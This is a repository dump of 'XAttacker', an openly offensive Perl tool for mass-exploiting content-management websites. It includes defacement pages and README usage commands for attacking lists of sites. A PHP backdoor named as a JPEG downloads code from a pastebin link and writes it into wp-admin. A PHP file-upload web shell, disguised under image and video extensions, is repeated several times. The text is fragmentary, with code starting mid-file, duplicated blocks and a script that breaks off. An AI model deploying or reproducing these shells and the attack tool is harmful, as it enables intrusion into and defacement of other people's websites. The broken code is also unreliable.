├── index.jpg
├── XAttacker.html
├── XAttacker.txt
├── XAttacker.html.j
├── Jattack.rar
├── XAttacker.gif
├── XAttacker.zip
├── XAttackerevs.zip
├── wpmobiledetectorshellonline.zip
├── BackDoor.jpg
├── XAttacker.jpg
├── XAttacker.php.mp4
├── XAttacker.php.png
├── XAttacker.phP3
├── XAttacker.php
├── XAttacker.php.php.j
├── nvn_extra_add.php
├── README.md
└── XAttacker.pl
/index.jpg:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi
--------------------------------------------------------------------------------
/XAttacker.html:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi
--------------------------------------------------------------------------------
/XAttacker.txt:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi
--------------------------------------------------------------------------------
/XAttacker.html.j:
--------------------------------------------------------------------------------
1 | HaCKeD BY Mohamed Riahi
--------------------------------------------------------------------------------
/Jattack.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/Jattack.rar
--------------------------------------------------------------------------------
/XAttacker.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.gif
--------------------------------------------------------------------------------
/XAttacker.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.zip
--------------------------------------------------------------------------------
/XAttackerevs.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttackerevs.zip
--------------------------------------------------------------------------------
/wpmobiledetectorshellonline.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alienwithin/XAttacker/master/wpmobiledetectorshellonline.zip
--------------------------------------------------------------------------------
/BackDoor.jpg:
--------------------------------------------------------------------------------
1 | ";
18 | }else
19 | echo "not exits";
20 | echo "done .\n " ;
21 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/shapes.php" ;
22 | $text2 = http_get('https://pastebin.com/raw/wDFRMJrx');
23 | $open2 = fopen($check2, 'w');
24 | fwrite($open2, $text2);
25 | fclose($open2);
26 | if(file_exists($check2)){
27 | echo $check2."";
28 | }else
29 | echo "not exits2";
30 | echo "done2 .\n " ;
31 |
32 |
33 | ?>
34 |
--------------------------------------------------------------------------------
/XAttacker.jpg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Uname:".php_uname()."
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
";
12 | echo '';
13 | if(isset($_POST['Submit'])){
14 | $filedir = "";
15 | $maxfile = '2000000';
16 | $mode = '0644';
17 | $userfile_name = $_FILES['image']['name'];
18 | $userfile_tmp = $_FILES['image']['tmp_name'];
19 | if(isset($_FILES['image']['name'])) {
20 | $qx = $filedir.$userfile_name;
21 | @move_uploaded_file($userfile_tmp, $qx);
22 | @chmod ($qx, octdec($mode));
23 | echo"
2 | 3 | .o oOOOOOOOo OOOo 4 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO 5 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO 6 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' 7 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo 8 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO 9 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO 10 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo. 11 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO 12 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO 13 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" 14 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` 15 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? 16 | oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo 17 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': 18 | `$" `OOOO' `O"Y ' `OOOO' o 19 | OP" : o 20 | [ X Attacker v2.0 ][ Coded By Mohamed Riahi ] 21 | [ Start At Tue Nov 7 12:30:48 2017 ] 22 |23 |
git clone https://github.com/Moham3dRiahi/XAttacker.git
29 |
30 | [+] Auto Cms Detect
31 |
32 | [1] WordPress :
116 |
117 | | Short Form | 123 |Long Form | 124 |Description | 125 |
|---|---|---|
| -l | 130 |--list | 131 |websites list | 132 |
perl XAttacker.pl -l list.txt
136 | use Win32::Console::ANSI;
138 |
139 |
140 | ⚠ Warning ⚠• speed up
148 |
• Bug fixes
149 | 150 | version 1.9 151 |
• Bug fixes
152 |
--------------------------------------------------------------------------------
/XAttacker.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | #Coded By Mohamed Riahi 10/10/2017
4 | #don't Change my Fucking Rights
5 |
6 | #past here
7 | use Getopt::Long;
8 | use HTTP::Request;
9 | use LWP::UserAgent;
10 | use IO::Select;
11 | use HTTP::Cookies;
12 | use HTTP::Response;
13 | use Term::ANSIColor;
14 | use HTTP::Request::Common qw(POST);
15 | use HTTP::Request::Common qw(GET);
16 | use URI::URL;
17 | use IO::Socket::INET;
18 | my $ua = LWP::UserAgent->new;
19 | $ua->timeout(10);
20 |
21 | GetOptions(
22 | "l|list=s" => \$list,
23 | );
24 |
25 | unless ($list) { help(); }
26 |
27 |
28 | sub help {
29 | print q(
30 | Usage: perl XAttacker.pl -l list.txt
31 | OPTIONS:
32 | -l => websites list
33 | );
34 | exit;}
35 |
36 | my $year = "2017";
37 | my $month = "11";
38 | my $datetime = localtime;
39 |
40 | system("title X Attacker v2.0");
41 | if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
42 | print color('bold green');
43 |
44 | $tmp="tmp";
45 | if (-e $tmp)
46 | {
47 | }
48 | else
49 | {
50 | mkdir $tmp or die "Error creating directory: $tmp";
51 | }
52 |
53 | $rez="Result";
54 | if (-e $rez)
55 | {
56 | }
57 | else
58 | {
59 | mkdir $rez or die "Error creating directory: $rez";
60 | }
61 |
62 |
63 |
64 | print q(
65 | .o oOOOOOOOo OOOo
66 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
67 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
68 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
69 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
70 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
71 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO
72 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
73 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
74 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
75 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
76 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
77 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?
78 | oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
79 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
80 | `$" `OOOO' `O"Y ' `OOOO' o
81 | OP" : o
82 | );
83 |
84 | print color('reset');
85 | print " ";
86 | print colored ("[ X Attacker v2.0 ]",'white on_red');
87 | print colored ("[ Coded By Mohamed Riahi ]\n",'white on_red');
88 | print " ";
89 | print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";
90 |
91 | $a = 0;
92 | open (THETARGET, "<$list") || die "[-] Can't open the file";
93 | @TARGETS =